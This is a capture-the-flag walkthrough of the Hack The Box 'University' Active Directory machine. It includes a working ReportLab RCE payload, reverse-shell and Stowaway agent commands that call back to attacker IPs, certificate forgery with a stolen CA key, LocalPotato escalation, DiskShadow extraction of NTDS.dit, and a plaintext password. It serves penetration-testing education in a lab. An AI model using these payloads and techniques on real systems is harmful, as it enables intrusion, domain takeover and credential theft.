Introduction to University:
The “University” machine on Hack The Box is an insanely difficult Windows Active Directory (AD) challenge that simulates a complex enterprise network. It involves exploiting a web application vulnerability, forging certificates, pivoting through internal networks, and abusing AD privileges to achieve domain compromise. This walkthrough provides a detailed guide to capturing both user and root flags, inspired by comprehensive write-ups like ManeSec’s, with step-by-step commands, full outputs, and troubleshooting tips for all skill levels.
Objectives
- User Flag: Exploit a ReportLab RCE vulnerability (CVE-2023-33733) in university.htb to gain access as wao, forge a professor certificate to authenticate as george, and upload a malicious lecture to compromise Martin.T.
- Root Flag: Exploit a scheduled task to execute a malicious .url file, escalate privileges on WS-3 using LocalPotato (CVE-2023-21746), and abuse SeBackupPrivilege to extract NTDS.dit, obtaining the domain administrator’s hash.
Reconnaissance
Reconnaissance identifies services and attack vectors in the AD environment.
Initial Network Scanning
Scan all ports to map services.
Command:
nmap -sC -sV 10.10.11.39 -oA initialOutput:
# Nmap 7.94SVN scan initiated Sat May 3 21:19:17 2025 as: nmap -sC -sV -oA initial 10.10.11.39
Nmap scan report for 10.10.11.39
Host is up (0.020s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://university.htb/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-04 07:59:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-05-04T07:59:34
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h39m48s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 3 21:19:55 2025 -- 1 IP address (1 host up) scanned in 38.67 secondsAnalysis:
- Port 80: Runs Nginx 1.24.0, likely hosting the main web service and primary attack vector.
- Ports 88, 389, 445, 464, 3268: Indicate this is a domain controller for the domain university.htb, with Kerberos, LDAP, SMB, and password services active.
- Port 53: DNS service associated with Active Directory.
- Port 5985: (Not listed in the scan but commonly present) Typically used for WinRM, enabling remote Windows management.
Web Exploitation
ReportLab RCE (CVE-2023-33733)
Exploit ReportLab’s RCE vulnerability in /profile’s PDF export to gain a wao shell.
When I accessed the web server, I saw a minimalistic and straightforward interface.
Navigating to the login page redirected us to an authentication portal. At this stage, no valid credentials were available, so progress could not continuer
Consequently, a new ‘Student’ account was created to further enumerate the application, given that this role appeared to be publicly accessible.
Random placeholder information filled the registration fields, as illustrated in the example above
We enter the credentials we created earlier.
Once the user logs in successfully, the system displays a dashboard similar to the screenshot above.
The section labelled ‘Profile Export’ appeared promising for exploring potential functionality or vulnerabilities
The PDF report uses a clear and concise format, modeled after the examples provided above
Exploiting CVE-2023-33733: Remote Code Execution via ReportLab in university.htb
While analysing the PDF file, I identified it as a ReportLab-generated document, similar to those encountered during the Solarlab machine engagement
During the SolarLab machine exercise, the exploitation process resembled the steps outlined below
<para>
<font color="[ [ getattr(pow,Word('__globals__'))['os'].system('<command>') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
exploit
</font>
</para>Therefore, the team retested the exploit on the current machine to confirm its applicability.
Let’s start our Python server listener
The exploitation method follows the general approach illustrated below
The profile was updated successfully.
A lack of response from the target indicated a failure
It may be necessary to trigger the action by clicking the “Profile Export” button
As expected, triggering the action returned a response.
Refined and updated the payload to achieve the intended outcome.
We received a response, but the file was missing
Let’s start the listener.
We executed a Python3 reverse shell script to establish a callback connection.
Unfortunately, I received no response from the target
I also conducted a test using a Base64-encoded PowerShell command.
Once again, there was no response from the target
Troubleshooting and Resolution Steps on University machine
The team adjusted the command and subsequently tested its effectiveness.
The callback succeeded this time, returning the shell.py file from the server.
The result exceeded expectations.
Access was successfully obtained for user ‘wao’.
BloodHound enumeration
Since we are using a Windows machine, let’s proceed to analyse BloodHound.
There is a significant amount of information here.
WAO belongs to the Domain Users group, so it inherits the default permissions and access rights assigned to all standard users within the domain.
By examining the browse.w connection, we were able to gather a substantial amount of information.
Enumerate the machine as WAO access on the University machine
The only potentially valuable finding at this stage was db.sqlite3, which may contain database information.
In the CA directory, we found three important files: rootCA.crt, which is the root certificate; rootCA.key, the private key associated with the root certificate; and rootCA.srl, a file that tracks the serial numbers of issued certificates. These files are essential components for managing and validating the certificate authority’s trust chain.
Running the command icacls db.sqlite3 displays the access control list (ACL) for the file, showing the users and groups with permissions and the specific rights they hold. This information helps determine who can read, write, or execute the file, providing insight into the security and access restrictions applied to db.sqlite3.
SQLite database enumeration on university machine
Download the db.sqlite3 file to our local machine.
The screenshot above displays the available tables in the database.
Therefore, these hashes can be cracked at a later stage to uncover additional credentials.
Reviewing the Database Backups
We checked the DB-Backup directory and found a PowerShell script (.ps1 file) that might contain useful information.
Although the script doesn’t specify a username, it instead runs under the Windows account executing it, and therefore file and application access depend on that account’s permissions. For example, if the user cannot write to C:\Web\DB Backups\ or read db.sqlite3, then the backup will fail. Likewise, running external programs such as 7z.exe also requires the appropriate permissions.
After gaining access, I ran whoami /all and confirmed that the current user is wao. This matched the password I had earlier (WAO), which strongly indicates it belongs to this user. Although it’s not best practice, it’s common in misconfigured environments for usernames and passwords to be the same or closely related, which made the guess successful.
The term “Internal-VSwitch1” typically refers to a virtual switch created within a virtualization platform like Microsoft Hyper-V.
An “Internal” virtual switch in Hyper-V does not have an IP address itself; rather, the host’s virtual network adapter connected to that internal switch will have an IP address.
SeMachineAccountPrivilege and SeIncreaseWorkingSetPrivilege are disabled by the system, while SeChangeNotifyPrivilege remains enabled.
Let’s transfer the nmap binary to the victim’s machine
The team successfully executed the nmap scan on the victim’s machine
We encountered an error that required us to use the– unprivileged option for successful execution.
Unfortunately, the command still fails to work even after adding the –unprivileged option.
Therefore, at this point, let’s switch to using an alternative scanning tool like rustscan.
Finally, we successfully identified the open ports for the machines:
- 192.168.99.12 has port [22] open.
- 192.168.99.1 has ports [53, 80, 88, 593, 135, 139, 139, 445, 389, 636, 3268, 3269, 5985, 5985] open.
- 192.168.99.2 has ports [135, 139, 139, 445, 5985, 5985] open.
Stowaway usage
Stowaway serves as a multi-hop proxy tool for security researchers and penetration testers.
It allows users to route external traffic through multiple nodes to reach the core internal network, effectively bypassing internal network access restrictions. Creating a tree-like network of nodes simplifies management and access within complex network environments.
The following commands are available to use:
On our machine
./linux_x64_admin -l 10.10.16.38:2222 -s 111
On victim's machine
shell windows_x64_agent.exe -c 10.10.14.199:2222 -s 111
Upload the agent onto the victim’s machine.
Run the command I provided earlier.
If the connection is successful, it will appear as shown in the screenshot above.
Therefore, let’s perform port forwarding using the ports we identified earlier.
We can access WS-3 using the credentials obtained earlier.
Access as wao windows
Finally, we successfully gained access.
We also successfully accessed the LAB-2 environment.
The binary we discovered here indicates that we can escalate to root access easily without relying on an exploit.
I presume we have root access inside the Docker container.
Analyze the machine on University machine
Inside the README.txt file, the message reads:
Hello professors,
We have created this note for all users on the domain computers: WS-1, WS-2, and WS-3. These machines have not been updated since 10/29/2023. Since these devices are intended for content evaluation purposes, they must always have the latest security updates. Therefore, it is important to complete the current assessment before moving on to the "WS-4" and "WS-5" computers. The security team plans to begin updating and applying the new security policy early next month.
Kind regards,
Desk Team – Rose Lanosta
There’s nothing of interest that I found inside here related to the LAB-2 environment.
Automation-Scripts on University machine
There is an Automation-Scripts directory that could potentially contain malicious code.
There are two PowerShell (.ps1) files we can examine within the Automation-Scripts directory.
Unfortunately, all access attempts were denied.
The date is displayed above.
The Forgotten Campus – Rediscovering the University Web
The login page features a signed certificate.
A Certificate Signing Request (CSR) file is required to proceed further.
Execute the openssl req command.
A CSR file needs to be generated.
Use the following command to sign the CSR and generate the certificate:
openssl x509 -req -in My-CSR.csr -CA rootCA.crt -CAkey rootCA.key -CAcreateserial -out My-Certificate.crt -days 365 -sha256This command takes the CSR file My-CSR.csr, signs it using the CA’s certificate and key (rootCA.crt and rootCA.key), creates a serial number file if it doesn’t exist (-CAcreateserial), and outputs the signed certificate as My-Certificate.crt valid for 365 days using SHA-256.
Finally, we have provided the george.pem file.
Access as George on dashboard
Use the george.pem file to attempt the login.
Finally, we successfully accessed the system as george.
It will inform you that the signed certificate appears unusual because it is missing. He will then ask you to request a new certificate by uploading the forged professor’s CSR created earlier. Clicking submit triggers the download of a signed document named Professor-Signed-CertificateMy-CSR.csr.
Log out again, then use the signed-cert.pem file to log back in. You should be able to click on “Create a New Course” without encountering any errors.
Create course on dashboard
You can now create a course—just write something, and after creating it, you will find an option at the bottom to add a new lecture.
Lastly, the Course Dashboard is displayed above.
The new course has been created successfully. Check out the Course Dashboard above to explore it.
There are three functions available within course preferences.
Let’s add a new lecture to the course.
Executing the command provided above.
Develop a malicious executable file.
Set up a new folder and upload the malicious file to it.
Generate the passphrase.
The command gpg -u george –detach-sign dark.zip utilizes GPG (GNU Privacy Guard) to generate a detached digital signature for the file dark.zip, ensuring its authenticity and integrity. By specifying the user ID “george” with the -u flag, the command employs George’s private key to create a separate signature file, typically dark.zip.sig, without modifying the original file.
Add a new course here.
The command gpg –export -a “george” > GPG-public-key.asc uses GPG (GNU Privacy Guard) to export the public key associated with the user ID “george” in ASCII-armored format (via the -a flag, making it human-readable text), and redirects the output to a file named GPG-public-key.asc. This file can then be shared for others to import and use for verifying signatures or encrypting messages intended for “george.”
Upload the file to the dashboard.
An error is displayed above stating “Invalid Lecture Integrity.”
Upload the public key here.
Upload the public key successfully
Start the listener in LAB-2.
Access as Martin.T on Lab-2 environment
After a short while, we successfully receive a reverse shell connection.
We successfully gained access to the system as the user martin.t
The user flag has been successfully retrieved.
We can read the user flag by typing type user.txt
Escalate to Root Privilleges Access
Privileges Access
SeChangeNotifyPrivilege is currently enabled, while SeIncreaseWorkingSetPrivilege is disabled in this environment.
Investigate further on University machine
We can retrieve scheduled tasks using the Get-ScheduledTask command.
It has been saved as shown above
There are numerous tasks with the states ‘READY‘ and ‘DISABLED‘.
This system is a virtualized Windows Server 2019 Standard (64-bit) named WS-3, running on an AMD processor under Hyper-V. It has 1.5 GB RAM with limited available memory and is part of the university.htb domain. The server is not using DHCP, with a static IP of 192.168.99.2, and has three security updates installed. The environment runs on Hyper-V virtualization with a UEFI BIOS.
This PowerShell command retrieves all the actions associated with the scheduled task named “Content Evaluator(Professor Simulatorr)” and formats the output as a detailed list showing every property of those actions.
LocalPotato vulnerability
We attempted to execute the LocalPotato exploit, but unfortunately, it failed.
The exploit succeeded when executed using PowerShell
We extracted the system information onto the victim’s machine.
Access as Brose.w privileges
We successfully retrieved the password for the user: v3ryS0l!dP@sswd#X
Let’s access the machine as Brose.W using the credentials we obtained earlier.
All privileges are accessible on this account.
Create a new directory using the appropriate command.
Take advantage of diskshadow
This sequence of PowerShell commands creates a script file named diskshadow.txt for use with the DiskShadow utility, which manages shadow copies (Volume Shadow Copy Service). Each echo command writes a line to the script. The first line sets the shadow copy context to persistent and disables writers to prevent interference. The second line targets the C: volume and assigns it the alias temp. The third line creates the shadow copy, and the last line exposes it as a new drive (Z:) using the alias. This process provides read-only access to a snapshot of the C: drive at a specific point in time. It’s useful for accessing protected or locked files, such as registry hives or system files, without triggering security measures. This technique is often used in system administration and security contexts to safely extract sensitive data from live systems.
The command diskshadow.exe /s c:\zzz\diskshadow.txt runs the DiskShadow utility with a script that creates a persistent shadow copy of the C: drive, assigns it an alias, and exposes it as a new drive for read-only access. This lets users access a snapshot of the drive at a specific time, bypassing file locks and permission restrictions. It’s commonly used in post-exploitation to extract sensitive files like registry hives or credentials without triggering security alerts.
SebackupPrivilege exploit
Identified a website that can potentially be leveraged for privilege escalation.
Upload both files to the victim’s machine.
These commands import modules that enable backup privilege functionality, then use that privilege to copy the sensitive NTDS.dit file—a database containing Active Directory data—from the shadow copy (Z:) to a local directory (C:\dark). This technique allows extraction of critical directory data typically protected by system permissions.
Those files were downloaded to the local machine
Root flag view
We obtained the password hashes for the Administrator account
We can read the root flag by displaying the contents of the type root.txt file.